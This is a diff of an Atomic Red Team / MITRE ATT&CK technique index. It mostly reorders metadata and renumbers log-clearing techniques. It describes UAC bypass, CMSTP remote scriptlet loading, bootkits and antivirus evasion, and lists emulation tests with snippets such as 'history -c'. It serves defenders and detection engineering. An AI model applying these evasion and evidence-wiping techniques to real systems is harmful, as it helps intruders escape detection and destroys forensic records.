created: '2020-01-30T13:58:14.373Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process command-line parameters
+ - API monitoring
+ - Process monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
@@ -20018,15 +20383,12 @@ defense-evasion:
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_data_sources:
- - Windows Registry
- - File monitoring
- - Process command-line parameters
- - API monitoring
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1134:
technique:
@@ -20075,15 +20437,28 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:55:15.343Z'
+ modified: '2020-04-16T19:37:02.355Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_platforms:
- - Windows
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_permissions_required:
- - User
- - Administrator
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
+ - Heuristic Detection
+ - Host forensic analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Tom Ueltschi @c_APT_ure
+ - Travis Smith, Tripwire
+ - Robby Winchester, @robwinchester3
+ - Jared Atkinson, @jaredcatkinson
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ - API monitoring
+ - Access tokens
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: "If an adversary is using a standard command-line shell,
analysts can detect token manipulation by auditing command-line activity.
Specifically, analysts should look for use of the runas command.
@@ -20105,26 +20480,13 @@ defense-evasion:
and ParentProcessID (which are also produced from ETW and other utilities
such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId
identifies the actual parent process."
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
- - API monitoring
- - Access tokens
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Tom Ueltschi @c_APT_ure
- - Travis Smith, Tripwire
- - Robby Winchester, @robwinchester3
- - Jared Atkinson, @jaredcatkinson
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- - Heuristic Detection
- - Host forensic analysis
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1550.001:
technique:
@@ -20170,23 +20532,23 @@ defense-evasion:
phase_name: lateral-movement
modified: '2020-03-23T20:24:52.899Z'
created: '2020-01-30T17:37:22.261Z'
- x_mitre_platforms:
- - Office 365
- - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_detection: Monitor access token activity for abnormal use and permissions
+ granted to unusual or suspicious applications and APIs.
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - OAuth audit logs
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
- Mark Wee
- x_mitre_data_sources:
- - Office 365 audit logs
- - OAuth audit logs
- x_mitre_detection: Monitor access token activity for abnormal use and permissions
- granted to unusual or suspicious applications and APIs.
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Office 365
+ - SaaS
atomic_tests: []
T1055.004:
technique:
@@ -20245,12 +20607,14 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-23T13:20:55.893Z'
+ modified: '2020-06-20T22:17:05.394Z'
created: '2020-01-14T01:29:43.786Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -20263,12 +20627,10 @@ defense-evasion:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1055.004
atomic_tests:
- name: Process Injection via C#
@@ -20351,31 +20713,31 @@ defense-evasion:
phase_name: persistence
modified: '2020-03-25T23:28:10.049Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Ricardo Dias
- - Red Canary
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - Packet capture
- - Windows event logs
- x_mitre_defense_bypassed:
- - Firewall
- - Host forensic analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host forensic analysis
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - Packet capture
+ - Windows event logs
+ x_mitre_contributors:
+ - Ricardo Dias
+ - Red Canary
+ x_mitre_version: '1.1'
identifier: T1197
atomic_tests:
- name: Bitsadmin Download (cmd)
@@ -20468,25 +20830,6 @@ defense-evasion:
name: command_prompt
T1027.001:
technique:
- id: attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5
- description: "Adversaries may use binary padding to add junk data and change
- the on-disk representation of malware. This can be done without affecting
- the functionality or behavior of a binary, but can increase the size of the
- binary beyond what some security tools are capable of handling due to file
- size limitations. \n\nBinary padding effectively changes the checksum of the
- file and can also be used to avoid hash-based blacklists and static anti-virus
- signatures.(Citation: ESET OceanLotus) The padding used is commonly generated
- by a function to create junk data and then appended to the end or applied
- to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing
- the file size may decrease the effectiveness of certain tools and detection
- capabilities that are not designed or configured to scan large files. This
- may also reduce the likelihood of being collected for analysis. Public file
- scanning services, such as VirusTotal, limits the maximum size of an uploaded
- file to be analyzed.(Citation: VirusTotal FAQ) "
- name: Binary Padding
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1027.001
@@ -20505,11 +20848,30 @@ defense-evasion:
- source_name: VirusTotal FAQ
url: 'https://www.virustotal.com/en/faq/ '
description: VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Binary Padding
+ description: "Adversaries may use binary padding to add junk data and change
+ the on-disk representation of malware. This can be done without affecting
+ the functionality or behavior of a binary, but can increase the size of the
+ binary beyond what some security tools are capable of handling due to file
+ size limitations. \n\nBinary padding effectively changes the checksum of the
+ file and can also be used to avoid hash-based blocklists and static anti-virus
+ signatures.(Citation: ESET OceanLotus) The padding used is commonly generated
+ by a function to create junk data and then appended to the end or applied
+ to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing
+ the file size may decrease the effectiveness of certain tools and detection
+ capabilities that are not designed or configured to scan large files. This
+ may also reduce the likelihood of being collected for analysis. Public file
+ scanning services, such as VirusTotal, limits the maximum size of an uploaded
+ file to be analyzed.(Citation: VirusTotal FAQ) "
+ id: attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T20:49:04.050Z'
+ modified: '2020-06-20T20:50:48.023Z'
created: '2020-02-05T14:04:25.865Z'
x_mitre_contributors:
- Martin Jirkal, ESET
@@ -20568,10 +20930,10 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1542.003
url: https://attack.mitre.org/techniques/T1542/003
- - url: https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf
- description: Mandiant. (2016, February). M-Trends 2016. Retrieved January
- 4, 2017.
- source_name: MTrends 2016
+ - source_name: Mandiant M Trends 2016
+ url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
+ description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
+ March 5, 2019.
- url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion
description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion?
(Infographic). Retrieved November 13, 2014.
@@ -20583,7 +20945,7 @@ defense-evasion:
description: |-
Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
- A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
+ A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba
@@ -20593,30 +20955,45 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-23T23:43:32.353Z'
+ modified: '2020-05-07T22:32:05.335Z'
created: '2019-12-19T21:05:38.123Z'
- x_mitre_platforms:
- - Linux
- - Windows
- x_mitre_data_sources:
- - VBR
- - MBR
- - API monitoring
- x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots
- of MBR and VBR and compare against known good samples. Report changes to MBR
- and VBR as they occur for indicators of suspicious activity and further analysis.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- Host intrusion prevention systems
- Anti-virus
- File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots
+ of MBR and VBR and compare against known good samples. Report changes to MBR
+ and VBR as they occur for indicators of suspicious activity and further analysis.
+ x_mitre_data_sources:
+ - VBR
+ - MBR
+ - API monitoring
+ x_mitre_platforms:
+ - Linux
+ - Windows
atomic_tests: []
T1548.002:
technique:
+ id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
+ description: |-
+ Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
+
+ If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
+
+ Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
+
+ * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
+
+ Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
+ name: Bypass User Access Control
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1548.002
@@ -20660,28 +21037,13 @@ defense-evasion:
description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe.
Retrieved May 25, 2017.
source_name: enigma0x3 sdclt bypass
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Bypass User Access Control
- description: |-
- Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
-
- If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
-
- Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
-
- * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
-
- Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
- id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T12:11:48.618Z'
+ modified: '2020-06-25T19:57:54.510Z'
created: '2020-01-30T14:24:34.977Z'
x_mitre_platforms:
- Windows
@@ -20907,7 +21269,7 @@ defense-evasion:
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
- Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
+ Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
id: attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49
@@ -20915,10 +21277,23 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T17:19:19.483Z'
+ modified: '2020-06-20T22:34:03.247Z'
created: '2020-01-23T18:27:30.656Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Nik Seetharaman, Palantir
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process use of network
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.
@@ -20926,21 +21301,8 @@ defense-evasion:
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
* To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Application whitelisting
- x_mitre_data_sources:
- - Windows event logs
- - Process use of network
- - Process command-line parameters
- - Process monitoring
- x_mitre_contributors:
- - Nik Seetharaman, Palantir
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ x_mitre_platforms:
+ - Windows
identifier: T1218.003
atomic_tests:
- name: CMSTP Executing Remote Scriptlet
@@ -20993,12 +21355,94 @@ defense-evasion:
'
name: command_prompt
- T1551.003:
+ T1574.012:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1551.003
- url: https://attack.mitre.org/techniques/T1551/003
+ external_id: T1574.012
+ url: https://attack.mitre.org/techniques/T1574/012
+ - source_name: Microsoft Profiling Mar 2017
+ url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview
+ description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June
+ 24, 2020.
+ - source_name: Microsoft COR_PROFILER Feb 2013
+ url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)
+ description: Microsoft. (2013, February 4). Registry-Free Profiler Startup
+ and Attach. Retrieved June 24, 2020.
+ - source_name: RedCanary Mockingbird May 2020
+ url: https://redcanary.com/blog/blue-mockingbird-cryptominer/
+ description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved
+ May 26, 2020.
+ - source_name: Red Canary COR_PROFILER May 2020
+ url: https://redcanary.com/blog/cor_profiler-for-persistence/
+ description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation
+ for persistence. Retrieved June 24, 2020.
+ - source_name: Almond COR_PROFILER Apr 2019
+ url: https://offsec.almond.consulting/UAC-bypass-dotnet.html
+ description: Almond. (2019, April 30). UAC bypass via elevated .NET applications.
+ Retrieved June 24, 2020.
+ - source_name: GitHub OmerYa Invisi-Shell
+ url: https://github.com/OmerYa/Invisi-Shell
+ description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24,
+ 2020.
+ - source_name: subTee .NET Profilers May 2017
+ url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
+ description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
+ Profilers. Retrieved June 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: COR_PROFILER
+ description: |-
+ Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-26T16:09:58.920Z'
+ created: '2020-06-24T22:30:55.843Z'
+ x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER,
+ monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and
+ COR_PROFILER_PATH that correspond to system and user environment variables
+ that do not correlate to known developer tools. Extra scrutiny should be placed
+ on suspicious modification of these Registry keys by command line tools like
+ wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring
+ for command-line arguments indicating a change to COR_PROFILER variables may
+ aid in detection. For system, user, and process scope abuse of the COR_PROFILER,
+ monitor for new suspicious unmanaged profiling DLLs loading into .NET processes
+ shortly after the CLR causing abnormal process behavior.(Citation: Red Canary
+ COR_PROFILER May 2020) Consider monitoring for DLL files that are associated
+ with COR_PROFILER environment variables.'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_contributors:
+ - Jesse Brown, Red Canary
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1070.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1070.003
+ url: https://attack.mitre.org/techniques/T1070/003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -21016,25 +21460,25 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:31:03.043Z'
created: '2020-01-31T12:32:08.228Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - File monitoring
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Log analysis
x_mitre_detection: User authentication, especially via remote terminal services
like SSH, without new entries in that user's ~/.bash_history
is suspicious. Additionally, the modification of the HISTFILE
and HISTFILESIZE environment variables or the removal/clearing
of the ~/.bash_history file are indicators of suspicious activity.
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Log analysis
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1551.003
+ x_mitre_data_sources:
+ - File monitoring
+ - Authentication logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ identifier: T1070.003
atomic_tests:
- name: Clear Bash history (rm)
auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc
@@ -21131,12 +21575,12 @@ defense-evasion:
. ~/.bashrc
history -c
name: sh
- T1551.002:
+ T1070.002:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1551.002
- url: https://attack.mitre.org/techniques/T1551/002
+ external_id: T1070.002
+ url: https://attack.mitre.org/techniques/T1070/002
- source_name: Linux Logs
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
@@ -21162,19 +21606,19 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:23:51.886Z'
created: '2020-01-28T17:11:54.034Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: File system monitoring may be used to detect improper deletion
+ or modification of indicator files. Also monitor for suspicious processes
+ interacting with log files.
x_mitre_data_sources:
- Process command-line parameters
- Process monitoring
- File monitoring
- x_mitre_detection: File system monitoring may be used to detect improper deletion
- or modification of indicator files. Also monitor for suspicious processes
- interacting with log files.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1551.002
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ identifier: T1070.002
atomic_tests:
- name: rm -rf
auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
@@ -21227,12 +21671,12 @@ defense-evasion:
'
name: bash
- T1551.001:
+ T1070.001:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1551.001
- url: https://attack.mitre.org/techniques/T1551/001
+ external_id: T1070.001
+ url: https://attack.mitre.org/techniques/T1070/001
- url: https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil
description: Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July
2, 2018.
@@ -21265,29 +21709,29 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:17:03.732Z'
created: '2020-01-28T17:05:14.707Z'
